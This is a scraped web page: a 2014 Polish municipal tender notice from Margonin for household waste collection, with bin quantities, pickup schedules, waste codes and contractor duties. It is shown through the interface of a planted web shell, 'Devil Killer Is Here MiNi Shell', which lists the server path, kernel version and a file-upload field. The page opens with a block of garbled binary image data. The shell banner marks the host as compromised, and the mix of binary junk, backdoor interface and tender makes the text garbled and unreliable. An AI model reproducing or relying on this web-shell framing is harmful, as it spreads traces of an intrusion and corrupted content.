JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140425/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140425/141626-N-2014.html

<p class="kh_header"><b>Margonin: Świadczenie usługi odbierania odpadów komunalnych od właścicieli nieruchomości, na których zamieszkują mieszkańcy Gminy Margonin.</b><br>
<b>Numer ogłoszenia: 141626 - 2014; data zamieszczenia: 25.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta i Gminy Margonin , ul. Kościuszki 13, 64-830 Margonin, woj. wielkopolskie, tel. 067 2846068, faks (067) 284 72 73.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.margonin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usługi odbierania odpadów komunalnych od właścicieli nieruchomości, na których zamieszkują mieszkańcy Gminy Margonin..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Wykonawca zobowiązany jest do odbioru odpadów komunalnych od właścicieli nieruchomości, na których zamieszkują mieszkańcy z terenu Gminy Margonin, wszystkich odpadów komunalnych. Opis grup odpadów, częstotliwość i sposób odbioru:
1)Niesegregowane (zmieszane) odpady komunalne, w tym żużel i popioły z pieców centralnego ogrzewania, pieców kaflowych lub innych źródeł ciepła (20 03 01).
Gromadzone w pojemnikach (kubłach) na odpady o pojemnościach: 120l, 240l, 1100l 
i workach (będących wyłącznie przedmiotem zamówienia - patrz Roz.III ust.4, odbieranych przez Wykonawcę regularnie co dwa tygodnie. Pojemniki i worki wystawiane będą przez właścicieli nieruchomości najpóźniej do godz. 7:00 w dniu wywozu w granicy nieruchomości lub bezpośrednio przy ogrodzeniu przed posesją, z wyjątkiem chodników lub innych miejsc przeznaczonych do ruchu pojazdów samochodowych oraz pieszych a także nieruchomości zamieszkania zbiorowego (zabudowa wielorodzinna) do których istnieje możliwość dojazdu do zbiorczych pojemników na odpady (powyżej 240l). Pierwszy odbiór wyżej wymienionych odpadów nastąpi w drugim tygodniu lipca 2014 roku (28 tydzień roku).
2)Odpady komunalne, segregowane: szkło (20 01 02), opakowania ze szkła (15 01 07); Gromadzone w pojemnikach (kubłach) o pojemnościach: 120l, 240l, 1100l i w workach o pojemności min. 120l odbieranych regularnie co 2 miesiące. Wykonawca zobowiązany jest do odbioru każdej ilości odpadów zebranych i wystawionych przez właściciela nieruchomości. Pojemniki wystawiane będą przez właścicieli nieruchomości najpóźniej do godz. 7:00 w dniu wywozu w granicy nieruchomości lub bezpośrednio przy ogrodzeniu przed posesją, z wyjątkiem chodników lub innych miejsc przeznaczonych do ruchu pojazdów samochodowych oraz pieszych a także nieruchomości zamieszkania zbiorowego (zabudowa wielorodzinna) do których istnieje możliwość dojazdu do zbiorczych pojemników na odpady. Odpady szklane zbierane razem z etykietami lub elementami zamykania opakowań. Pierwszy odbiór wyżej wymienionych odpadów nastąpi w pierwszym lub drugim tygodniu sierpnia 2014 roku
(31 lub 32 tydzień roku).
3)Odpady komunalne segregowane jak:
papier (20 01 01) oraz opakowania z papieru i tektury (15 01 01),
metale (20 01 40) oraz opakowania z metali (15 01 04),
tworzywa sztuczne (20 01 39) oraz opakowania z tworzyw sztucznych (15 01 02),
opakowania wielomateriałowe (15 01 05),
zbierane łącznie, gromadzone w pojemnikach (kubłach) lub/i w workach o pojemności
min. 120 l, odbierane regularnie co miesiąc. Wykonawca zobowiązany jest do odbioru każdej ilości odpadów zebranych i wystawionych przez właściciela nieruchomości. Pojemniki lub/i worki (worki będące przedmiotem zamówienia jak i worki własne) wystawiane będą przez właścicieli nieruchomości najpóźniej do godz. 7:00 w dniu wywozu w granicy nieruchomości lub bezpośrednio przy ogrodzeniu przed posesją, z wyjątkiem chodników lub innych miejsc przeznaczonych do ruchu pojazdów samochodowych oraz pieszych a także nieruchomości zamieszkania zbiorowego (zabudowa wielorodzinna) do których istnieje możliwość dojazdu do zbiorczych pojemników na odpady. Pierwszy odbiór wyżej wymienionych odpadów nastąpi w pierwszym lub drugim tygodniu lipca 2014 roku (27 lub 28 tydzień roku).
4)Odpady komunalne, segregowane jak:
odpady kuchenne ulegające biodegradacji (20 01 08); odpady ogrodowe i zielone
(20 01 99, 20 02 01, 20 03 02, 20 02 03). Gromadzone w workach o pojemności min. 120l, odbieranych regularnie co dwa tygodnie w miesiącach od kwietnia do listopada włącznie). Wykonawca zobowiązany jest do odbioru każdej ilości odpadów zebranych i wystawionych przez właściciela nieruchomości. Worki (będące przedmiotem zamówienia jak i worki własne) wystawiane będą przez właścicieli nieruchomości najpóźniej do godz. 7:00 w dniu wywozu w granicy nieruchomości lub bezpośrednio przy ogrodzeniu przed posesją, z wyjątkiem chodników lub innych miejsc przeznaczonych do ruchu pojazdów samochodowych oraz pieszych a także nieruchomości zamieszkania zbiorowego (zabudowa wielorodzinna) do których istnieje możliwość dojazdu do zbiorczych pojemników na odpady. Pierwszy odbiór wyżej wymienionych odpadów nastąpi w pierwszym tygodniu lipca 2014 roku (27 tydzień roku).
b)przeterminowane leki cytotoksyczne i cytostatyczne (20 01 31) oraz inne leki niż
20 01 31 (20 01 32) i chemikalia (w tym m.in. zużyty olej i tłuszcze niejadalne, opakowania po nawozach sztucznych, worki po sianokiszonce, farby i lakiery, kleje, rozpuszczalniki):
20 01 13 - Rozpuszczalniki
20 01 14 - Kwasy
20 01 15 - Alkalia
20 01 17 - Odczynniki fotograficzne
20 01 19 - Środki ochrony roślin I i II klasy toksyczności (bardzo toksyczne i toksyczne np. herbicydy, insektycydy)
20 01 25 - Oleje i tłuszcze jadalne
20 01 26 - Oleje i tłuszcze inne niż wymienione w 20 01 25
20 01 27 - Farby, tusze, farby drukarskie, kleje, lepiszcze i żywice zawierające substancje niebezpieczne
20 01 28 - Farby, tusze, farby drukarskie, kleje, lepiszcze i żywice inne niż wymienione w 20 01 27
20 01 29 - Detergenty zawierające substancje niebezpieczne
20 01 30 - Detergenty inne niż wymienione w 20 01 29
20 01 80 - Środki ochrony roślin inne niż wymienione w 20 01 19
20 01 99 - Inne niewymienione frakcje zbierane w sposób selektywny
20 03 99 - Odpady komunalne niewymienione w innych podgrupach
Baterie i akumulatory łącznie z bateriami i akumulatorami wymienionymi
w 16 06 01, 16 06 02 lub 16 06 03 oraz niesortowane baterie i akumulatory zawierające te baterie (20 01 33), Baterie i akumulatory inne niż wymienione
w 20 01 33 (20 01 34), Zużyte urządzenia elektryczne i elektroniczne inne niż wymienione w 20 01 21 i 20 01 23 zawierające niebezpieczne składniki
(20 01 35), Zużyte urządzenia elektryczne i elektroniczne inne niż wymienione w 20 01 21, 20 01 23 i 20 01 35 (20 01 36), Lampy fluorescencyjne i inne odpady zawierające rtęć (20 01 21), Urządzenia zawierające freony (20 01 23);
meble i inne odpady wielkogabarytowe (20 03 07);
zużyte opony (16 01 03);
odpady budowlane powstałe w trakcie samodzielnego wykonywania robót przez właścicieli nieruchomości (nie wymagające pozwolenia na budowę lub zgłoszenia robót budowlanych - zgodnie z ustawą Prawo budowlane) (20 03 99),
odzież (20 01 10), tekstylia (20 01 11),
drewno zawierające substancje niebezpieczne (20 01 37), drewno inne niż wymienione w 20 01 37 (20 01 38),
Powyższe odpady odbierane będą przez Wykonawcę dwa razy w roku (w miesiącu kwietniu lub/i maju oraz w październiku lub/i listopadzie) poprzez mobilny punkt zbierania odpadów komunalnych (tzw. gratowóz. Wykonawca zobowiązany jest do odbioru każdej ilości odpadów zebranych i wystawionych przez właściciela nieruchomości, bez względu na domniemany okres ich wytworzenia. Odpady te będą wystawiane przez właścicieli nieruchomości najpóźniej do godz. 7:00 w dniu wywozu, przy wjeździe na nieruchomość w workach, pojemnikach lub bez umieszczania ich w jakichkolwiek pojemnikach.
Do obowiązku Wykonawcy należy poinformowanie o tym fakcie społeczeństwo co najmniej 2 tygodnie przed datą odbioru odpadów, o których w Roz. III, ust 1 pkt 4 lib b) SIWZ,
poprzez opublikowanie ogłoszeń na publicznych tablicach ogłoszeń oraz w innych miejscach użyteczności publicznej.
Przez okres trwania umowy Wykonawca zobowiązany jest do bezpłatnego użyczenia Zamawiającemu wskazanej szacunkowej liczby pojemników i wyposażenie nimi nieruchomości zamieszkałych (dostarczenie pod wskazany adres). Użyczenie obejmie pojemniki służące zbieraniu odpadów: niesegregowanych (zmieszanych) odpadów komunalnych i szklanych. Pojemniki winny spełniać warunki obowiązujących norm. Wykaz pojemników i ich usytuowanie stanowić będzie załącznik do umowy z Wykonawcą.
Zamawiający dopuszcza możliwość zmiany wskazanej ilości pojemników (np.: ze względu na zmianę liczby osób zamieszkujących nieruchomości lub powstanie nowego gospodarstwa domowego). Dopuszczalny zakres zmian do:
5% szacunkowej wielkości zamówienia, wynikających z powstania lub likwidacji gospodarstwa domowego,
15% szacunkowej wielkości zamówienia, wynikających ze zmiany wielkości pojemnika w istniejących gospodarstwach domowych.
Zwiększenie lub zmniejszenie liczby lub rodzaju (pojemności) pojemników nie będzie miało wpływu na ustaloną cenę wykonania usługi. Pojemniki należy dostarczyć do dnia 25 czerwca 2014 roku lub w terminie do 5 dni roboczych od dnia podpisania umowy.
Liczba pojemników, z podziałem na typ i pojemność:
Pojemniki		odpady	szkło		papier, plastik
zmieszane	metal, opakowania wielomateriałowe
120 litrów	1000 szt.	1000 szt.	0 szt.
240 litrów470 szt.	470 szt.	0 szt.
1100 litrów	25 szt.		25 szt.		30 szt.
Zamawiający dopuszcza możliwość łączenia pojemników przez Wykonawcę w obrębie jednego budynku wielolokalowego. Pojemnik Wykonawcy nie może być mniejszy niż suma pojemności pojemników wskazanych przez Zamawiającego.
W przypadku gdy pojemnik uległ zniszczeniu z winy nie spowodowanej przez osoby zamieszkujące daną nieruchomość Wykonawca, zobowiązany jest dany pojemnik naprawić lub wymienić na wolny od wad.
3.Wykonawca zobowiązany jest do bezpłatnego dostarczenia właścicielom nieruchomości nieograniczonej ilości worków, jednak w granicach zwyczajowo przyjętych ilości,
o odpowiedniej wytrzymałości i pojemności, przeznaczonych do selektywnej zbiórki odpadów segregowanych, o których mowa w Roz.III ust 1 pkt 2, Roz.III ust 1 pkt 3, Roz.III ust 1 pkt 4 lit a).
Zasady zaopatrzenia właścicieli nieruchomości w worki:
1)Wykonawca zaopatrywać będzie nieruchomości w worki na odpady każdorazowo w trakcie odbioru selektywnie zbieranych odpadów komunalnych (według zasady: ilość worków odebranych równa jest ilości pozostawionych worków),
2)pierwsze worki pakiet startowy na odpady segregowane, w ilości po 4 szt. należy dostarczyć do każdego gospodarstwa domowego do 25 czerwca 2014 roku lub w terminie do 5 dni roboczych od dnia podpisania umowy.
3)worki powinny być przeźroczyste, o grubości zapobiegającej pęknięciu lub rozerwaniu.
4)w przypadku przejściowego braku worków w kolorze, określonym w Uchwale Nr XXIII/226/2012 Rady Miasta i Gminy Margonin z dnia 7 listopada 2012 roku,
w sprawie regulaminu utrzymania czystości i porządku na terenie miasta i gminy Margonin (Dziennik Urzędowy Województwa Wielkopolskiego, poz. 5918, z dnia 10 grudnia 2012 roku), dopuszcza się umieszczenie odpadów w workach o innym kolorze dostarczonych przez Wykonawcę.
5)dopuszcza się zbieranie odpadów segregowanych i biodegradowanych w workach
właścicieli nieruchomości, na których zamieszkują mieszkańcy, które odbierze 4.Wykonawca zgodnie z harmonogramem zbiórki, bez względu na ich ilość.
Wykonawca zobowiązany jest do bezpłatnego dostarczenia Zamawiającemu,
do dnia 25 czerwca 2014 roku lub w terminie do 20 dni roboczych od dnia podpisania umowy, 100 szt. worków o pojemności 120 l. służących zbieraniu niesegregowanych (zmieszanych) odpadów komunalnych. Worki koloru czarnego, o grubości 0,1mm, z opisem:
Gmina Margonin. Odpady komunalne (zmieszane). Wielkość i usytuowanie napisu umożliwiające identyfikację worka. Odbiór odpadów niesegregowanych (zmieszanych) składowanych w workach wyłącznie w workach będących przedmiotem zamówienia.
5.Wykonawca zobowiązany jest do bezpłatnego dostarczenia do Urzędu Miasta i Gminy Margonin 1 000 szt. worków na odpady segregowane (w celu umożliwienia pobrania dodatkowych worków mieszkańcom Gminy Margonin) do dnia 25 czerwca 2014 roku lub w terminie do 5 dni roboczych od dnia podpisania umowy. Wykonawca zobowiązany jest do bieżącego uzupełniania stanu ilościowego dostępnych w Urzędzie Miasta i Gminy Margonin worków.
IV. Dane liczbowe charakteryzujące przedmiot zamówienia oraz inne wytyczne i wymagania stawiane Wykonawcy.
1.Szczegółowe wymagania stawiane przedsiębiorcom świadczącym usługi odbierania odpadów komunalnych od właścicieli nieruchomości, na których zamieszkują mieszkańcy z terenu Gminy Margonin.
1)Wykonawca zobowiązany jest do odbierania wszystkich odpadów komunalnych
od właścicieli nieruchomości, na których zamieszkują mieszkańcy z terenu Gminy Margonin, zgodnie z wykazem będącym załącznikiem do umowy. Załączone wykazy mają charakter informacyjny, mogą więc ulegać zmianie w trakcie trwania umowy oraz mogą nie odzwierciedlać rzeczywistego stanu na dzień zawarcia umowy. Wykonawcy nie przysługują roszczenia z tytułu wzrostu kosztów realizacji przedmiotu umowy, z zastrzeżeniem zasad wynikających z Roz.III ust 2.
2)Wykonawca zobowiązany jest zbierać odpady w taki sposób, aby nie dopuścić do zmieszania selektywnie zebranych odpadów komunalnych ze zmieszanymi odpadami komunalnymi odbieranymi od właścicieli nieruchomości - zgodnie z art. 9e ust.2 ustawy z dnia 13 września 1996 roku o utrzymaniu czystości i porządku w gminach (tekst jednolity: Dz. U. z 2013 roku poz. 1399 ze zmianami),
3)Wykonawca zobowiązany jest do odbioru odpadów z posesji niezależnie od standardu jakościowego dróg przy których się one znajdują oraz niezależnie od odległości posesji od pierwszej linii zabudowy.
4)Jeśli ze względu na utrudnienia w przejezdności dróg, niemożliwy będzie odbiór i wywóz odpadów z nieruchomości w terminie przewidzianym w harmonogramie, 5)Wykonawca zobowiązany jest do ich odbioru w terminie do 2 dni od dnia, w którym został poinformowany przez Zamawiającego bądź właściciela nieruchomości, że droga stała się przejezdną w takich przypadkach Wykonawcy nie przysługują roszczenia z tytułu wzrostu kosztów realizacji przedmiotu umowy.
Wykonawca zobowiązany jest poinformować Zamawiającego o każdym przypadku niemożności odebrania odpadów z danej nieruchomości ze względu na brak współdziałania właściciela tej nieruchomości, np. w przypadku gdy właściciel nie wystawia pojemników, worków z odpadami w dniach odbioru odpadów.
6Wykonawca zobowiązany jest do opracowania harmonogramu odbierania odpadów,
z uwzględnieniem poszczególnych rodzajów odpadów;
7)Harmonogram co do treści i formy wymaga akceptacji Zamawiającego.
Wykonawca przedstawi Zamawiającemu harmonogram w terminie do 3 dni po podpisaniu umowy. Zamawiający zaakceptuje harmonogram lub przedstawi uwagi do niego w terminie do 3 dni od dnia jego otrzymania. Wykonawca w terminie 3 dni wprowadzi uwagi Zamawiającego oraz przedstawi go do ponownej akceptacji.
8)Wykonawca bezpłatnie zaopatrzy wszystkich obsługiwanych właścicieli nieruchomości,
w harmonogramy zbiórki odpadów uwzględniając następujące wymogi:
dla każdego gospodarstwa domowego - 1 egzemplarz w formie papierowej;
harmonogram powinien być dostarczony najpóźniej do dnia 25 czerwca 2014 roku lub w terminie do 5 dni roboczych od dnia podpisania umowy;
harmonogram przygotowany zostanie minimum na okres półrocza obowiązywania umowy,
w przypadku opracowania harmonogramu na okres np.: półrocza, kolejny harmonogram musi być dostarczony mieszkańcom najpóźniej na tydzień przed jego obowiązywaniem,
Wypełnieniem obowiązku doręczenia harmonogramu będzie włożenie go do skrzynek pocztowych każdego gospodarstwa domowego;
Wykonawca winien umieścić harmonogram na własnej stronie internetowej i eksponować go przez cały okres na jaki został przygotowany;
harmonogram nie powinien zawierać żadnych dodatkowych treści ponad informacje związane z wykonywaniem zamówienia, w szczególności reklam, informacji propagandowych itd. Dopuszcza się wypisanie w harmonogramie danych adresowych i kontaktowych Wykonawcy jaki i Zamawiającego oraz sposobu segregacji odpadów,
w przypadku nieprzewidzianych okoliczności dopuszcza się zmianę terminu odbioru odpadów za zgodą Zamawiającego. Wykonawca odpowiedzialny będzie w takim przypadku do indywidualnego poinformowania właścicieli nieruchomości których zmiana dotyczy;
9)Odbiór odpadów powinien odbywać się w dni powszednie oraz soboty z wyłączeniem świąt w godz. 7:00 - 22:00.
10)W przypadku gdy ustalony dzień tygodnia lub miesiąca dla odbioru odpadów przypada w dniu ustawowo wolnym od pracy, Wykonawca zapewni odbiór odpadów w następnym dniu będącym dniem ustawowo wolnym od pracy;
11)Wykonawca zapewni regularność i powtarzalność odbierania, tak aby mieszkańcy mogli w łatwy sposób zaplanować przygotowanie odpadów do odebrania
12)Wykonawca będzie odbierał odpady z pojemników, będących własnością właścicieli nieruchomości, spełniających warunki obowiązujących norm.
13)Wykonawca ponosi całkowitą odpowiedzialność za odbiór odpadów komunalnych zgodnie z obowiązującymi przepisami i normami. Dotyczy to między innymi przeładunku, transportu, odzysku, unieszkodliwiania oraz wszelkich spraw formalno - prawnych związanych ze zbieraniem, transportem, odzyskiem, czy unieszkodliwianiem lub przekazaniem odpadów uprawnionemu przedsiębiorcy prowadzącemu działalność w zakresie odzysku lub unieszkodliwiania odpadów komunalnych.
14)Wykonawca ponosi pełną odpowiedzialność za szkody wyrządzone podczas wykonywania przedmiotu zamówienia.
15)W przypadku, gdy Wykonawca spowodował uszkodzenie bądź zniszczenie pojemnika (kubła) na odpady, zobowiązany jest dany pojemnik naprawić lub wymienić na wolny od wad.
16)W przypadku gdy pojemnik uległ zniszczeniu z winy nie spowodowanej przez osoby zamieszkujące daną nieruchomość Wykonawca, zobowiązany jest pojemnik naprawić lub wymienić na wolny od wad.
17)W przypadku wyrządzonych szkód (np.: w drodze, ogrodzeniu, budynku, itp.) Wykonawca zobowiązany jest do naprawienia wyrządzonej szkody na zasadach ogólnych Kodeksu Cywilnego oraz ustalonych w porozumieniu z właścicielem nieruchomości.
18)Wykonawca zobowiązany jest do spełnienia wymagań określonych w Rozporządzeniu Ministra Środowiska z dnia 11 stycznia 2013 roku w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz. U. z 2013 roku, poz. 122).
19)Wykonawca zobowiązany jest do realizacji reklamacji(nieodebranie z nieruchomości odpadów zgodnie z harmonogramem, nie pozostawienie worków na odpady segregowane, itp.) w przeciągu 24 godzin od otrzymania zawiadomienia od Zamawiającego.
Załatwienie reklamacji należy niezwłocznie potwierdzić Zamawiającemu.
20)Wykonawca zobowiązany jest do przekazywania odebranych od właścicieli nieruchomości selektywnie zebranych odpadów komunalnych do instalacji odzysku i unieszkodliwiania odpadów, zgodnie z hierarchią postępowania odpadami, o której mowa w art. 17 ustawy z dnia 14 grudnia 2012 roku o odpadach (Dz. U. z 2013 roku, poz. 21).
21)W przypadku gdy odpady komunalne zmieszane są gromadzone niezgodnie
z regulaminem (np. poza pojemnikiem, w pojemniku niezgodnym z regulaminem,
lub w niedopuszczonym worku) Wykonawca odbierze odpady oraz powiadomi gminę o działaniu właściciela nieruchomości niezgodnym z regulaminem.
22)Wykonawca zobowiązany jest do bezwzględnego przekazania wszystkich odebranych odpadów komunalnych od właścicieli nieruchomości:
z chwilą rozpoczęcia działalności w zakresie przyjęć odpadów komunalnych do mającej status regionalnej instalacji przetwarzania odpadów komunalnych Międzygminnego Składowiska Odpadów Komunalnych Sp. z o.o. w Kopaszynie,
do czasu uruchomienia ww. instalacji i uzyskania wszelkich prawem przewidzianych pozwoleń odebrane odpady Wykonawca winien przekazać do jednej z regionalnych instalacji do przetwarzania odpadów komunalnych wskazanych w Uchwale nr XXV/441/12 Sejmiku Województwa Wielkopolskiego z dnia 27 sierpnia 2012 roku w sprawie wykonania Planu gospodarki odpadami dla województwa wielkopolskiego na lata 2012-2017,
23)Zamawiający na podstawie zmiany w deklaracji o wysokości opłaty za gospodarowanie odpadami komunalnymi bądź nowej deklaracji będzie dokonywał bieżącej aktualizacji danych. Wykonawca w przypadku uzyskania informacji o zmianie ilości mieszkańców lub zmianie ilości i pojemności pojemników (na podstawie zmiany w deklaracji o wysokości opłaty za gospodarowanie odpadami komunalnymi, bądź nowej deklaracji) uwzględni w swojej ewidencji (kartotece) zmiany i wyposaży nieruchomość w pojemniki, harmonogram oraz będzie odbierać odpady zgodnie z harmonogramem, w terminie do 14 dni kalendarzowych, od otrzymania informacji.
2. Standard sanitarny wykonywania usług oraz ochrony środowiska:
1)Wykonawca odbierający odpady komunalne zobowiązany jest do zapewnienia, aby pojazdy i urządzenia były zabezpieczone przed niekontrolowanym wydostawaniem się na zewnątrz odpadów, podczas ich gromadzenia, przeładunku, a także transportu.
2)Wykonawca odbierający odpady komunalne zobowiązany jest do uporządkowania terenu w przypadku jego zanieczyszczenia w trakcie załadunku odpadów na pojazd.
3)Wykonawca zobowiązany jest do utrzymywania odpowiedniego stanu sanitarnego pojazdów i urządzeń do odbierania odpadów komunalnych.
4)Wykonawca nie powinien odmówić zbierania odpadów leżących luzem obok zapełnionych pojemników, kontenerów lub worków wskutek przepełnienia ww. urządzeń (pojemników) służących do gromadzenia odpadów. Obowiązek ten winien być realizowany niezwłocznie po opróżnieniu pojemników.
3. Obowiązek prowadzenia dokumentacji, sprawozdawczości związanej z działalnością objętą zamówieniem.
1)Wykonawca zobowiązany jest do bieżącego prowadzenia ilościowej i jakościowej ewidencji (kartotek) odpadów odbieranych od właścicieli nieruchomości zamieszkałych, zgodnie z przepisami ustawy o odpadach oraz ustawy o otrzymaniu czystości i porządku w gminach.
2)Wykonawca zobowiązany jest do pisemnego powiadomienia Zamawiającego, najpóźniej w następnym dniu po zaistnieniu zdarzenia, o każdej odmowie odbioru odpadów z terenu nieruchomości, wraz z uzasadnieniem.
3)Wykonawca zobowiązany jest do prowadzenia dokumentacji związanej z działalnością objętą zamówieniem, tj. sporządzanie i przekazywanie Zamawiającemu kwartalnych sprawozdań w terminie do końca miesiąca następującego po kwartale, którego dotyczy - zgodnie z art. 9n i art. 9t ustawy o utrzymania czystości i porządku w gminach wraz z kartami przekazania odpadów (oddzielnie dla każdej frakcji odpadu komunalnego) według wzoru określonego w Rozporządzeniu Ministra Środowiska z dnia 15 maja 2012 roku w sprawie wzorów sprawozdań o odebranych odpadach komunalnych, odebranych nieczystościach ciekłych oraz realizacji zadań z zakresu gospodarowania odpadami komunalnymi (Dz. U. poz. 630 ze zmianami).
4)Wykonawca zgodnie z art. 9p ustawy z dnia 13 września 1996 roku o utrzymaniu czystości i porządku w gminach (tekst jednolity: Dz. U. z 2013 roku poz. 1399 ze zmianami) zobowiązany jest na prośbę Zamawiającego do okazania dokumentów sporządzonych na potrzeby ewidencji odpadów.
5)Wszystkie pojazdy do świadczenia usługi muszą być wyposażone w system monitoringu bazującego na systemie pozycjonowania satelitarnego, umożliwiający trwałe zapisanie danych o położeniu pojazdu, miejscach pojazdów oraz system czujników zapisujących dane o miejscach wyładunku odpadów, system musi umożliwiać weryfikację tych danych.
6)Dane o położeniu pojazdów pochodzące z systemu monitoringu, powinny być przechowywane w siedzibie podmiotu odbierającego odpady komunalne od właścicieli nieruchomości przez okres 1 roku od dnia ich zapisania. 
7)Wykonawca powinien posiadać oprogramowanie oraz odpowiednie licencje umożliwiające odczyt, prezentację i weryfikację przechowywanych danych oraz udostępnić je na każde żądanie organowi właściwemu ze względu na prowadzenie działalności w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości, a także organom kontrolującym.
4. Dane ilościowe charakteryzujące Gminę Margonin
